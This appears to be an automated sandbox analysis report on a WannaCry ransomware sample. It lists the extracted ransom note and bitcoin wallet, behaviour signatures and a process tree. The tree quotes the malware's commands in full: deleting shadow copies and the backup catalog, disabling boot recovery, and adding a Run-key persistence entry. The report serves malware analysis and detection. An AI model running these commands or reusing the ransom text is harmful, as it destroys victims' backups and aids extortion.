Resubmissions
31-12-2019 13:17
191231-af79t7zt9a 10Analysis
-
max time kernel
143s -
resource
win7v191014 -
submitted
31-12-2019 13:17
Task
task1
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7v191014
0 signatures
Task
task2
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10v191014
0 signatures
General
-
Target
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
-
Sample
191231-af79t7zt9a
-
SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Signatures
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 836 @[email protected] -
Deletes shadow copies 2 TTPs 2 IoCs
pid Process 1920 WMIC.exe 1852 vssadmin.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1100 attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1296 icacls.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1604 @[email protected] 1552 @[email protected] 836 @[email protected] 976 @[email protected] 1616 @[email protected] 1112 @[email protected] -
Executes dropped EXE 16 IoCs
pid Process 2040 taskdl.exe 1604 @[email protected] 1552 @[email protected] 1992 taskhsvc.exe 2044 taskdl.exe 1116 taskse.exe 836 @[email protected] 1852 taskdl.exe 1892 taskse.exe 976 @[email protected] 784 taskdl.exe 1756 taskse.exe 1616 @[email protected] 760 taskdl.exe 1124 taskse.exe 1112 @[email protected] -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1992 taskhsvc.exe -
Loads dropped DLL 5 IoCs
pid Process 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 1408 cscript.exe 1852 cmd.exe 1604 @[email protected] 1992 taskhsvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Adds Run entry to start application 2 TTPs 1 IoCs
description ioc Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ftqqepmlkbmm513 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 596 wrote to memory of 1100 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 27 PID 596 wrote to memory of 1296 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 29 PID 596 wrote to memory of 2040 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 31 PID 596 wrote to memory of 1988 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 32 PID 1988 wrote to memory of 1408 1988 cmd.exe 34 PID 596 wrote to memory of 1604 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 36 PID 596 wrote to memory of 1852 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 37 PID 1852 wrote to memory of 1552 1852 cmd.exe 39 PID 1604 wrote to memory of 1992 1604 @[email protected] 41 PID 596 wrote to memory of 2044 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 43 PID 596 wrote to memory of 1116 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 44 PID 596 wrote to memory of 836 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 45 PID 596 wrote to memory of 1444 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 46 PID 1552 wrote to memory of 108 1552 @[email protected] 48 PID 1444 wrote to memory of 1716 1444 cmd.exe 50 PID 108 wrote to memory of 1852 108 cmd.exe 51 PID 108 wrote to memory of 1920 108 cmd.exe 53 PID 596 wrote to memory of 1852 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 55 PID 596 wrote to memory of 1892 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 57 PID 596 wrote to memory of 976 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 58 PID 596 wrote to memory of 784 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 59 PID 596 wrote to memory of 1756 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 60 PID 596 wrote to memory of 1616 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 61 PID 596 wrote to memory of 760 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 64 PID 596 wrote to memory of 1124 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 65 PID 596 wrote to memory of 1112 596 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 66 -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1716 reg.exe -
Drops startup file 6 IoCs
description ioc Process File deleted C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6D40.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created (read-only) C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD6D73.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD6D73.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File deleted C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD6D73.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created (read-only) C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6D40.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6D40.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeTcbPrivilege 1116 taskse.exe Token: SeBackupPrivilege 1596 vssvc.exe Token: SeRestorePrivilege 1596 vssvc.exe Token: SeAuditPrivilege 1596 vssvc.exe Token: SeIncreaseQuotaPrivilege 1920 WMIC.exe Token: SeSecurityPrivilege 1920 WMIC.exe Token: SeTakeOwnershipPrivilege 1920 WMIC.exe Token: SeLoadDriverPrivilege 1920 WMIC.exe Token: SeSystemProfilePrivilege 1920 WMIC.exe Token: SeSystemtimePrivilege 1920 WMIC.exe Token: SeProfSingleProcessPrivilege 1920 WMIC.exe Token: SeIncBasePriorityPrivilege 1920 WMIC.exe Token: SeCreatePagefilePrivilege 1920 WMIC.exe Token: SeBackupPrivilege 1920 WMIC.exe Token: SeRestorePrivilege 1920 WMIC.exe Token: SeShutdownPrivilege 1920 WMIC.exe Token: SeDebugPrivilege 1920 WMIC.exe Token: SeSystemEnvironmentPrivilege 1920 WMIC.exe Token: SeRemoteShutdownPrivilege 1920 WMIC.exe Token: SeUndockPrivilege 1920 WMIC.exe Token: SeManageVolumePrivilege 1920 WMIC.exe Token: 33 1920 WMIC.exe Token: 34 1920 WMIC.exe Token: 35 1920 WMIC.exe Token: SeTcbPrivilege 1892 taskse.exe Token: SeTcbPrivilege 1756 taskse.exe Token: SeTcbPrivilege 1124 taskse.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
- Drops startup file
PID:596 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:1100
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2040
-
-
C:\Windows\SysWOW64\cmd.execmd /c 106101577803695.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵
- Loads dropped DLL
PID:1408
-
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @[email protected] vs2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:108 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Deletes shadow copies
PID:1852
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Deletes shadow copies
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2044
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:836
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ftqqepmlkbmm513" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ftqqepmlkbmm513" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
- Modifies registry key
PID:1716
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:784
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1616
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:760
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1112
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596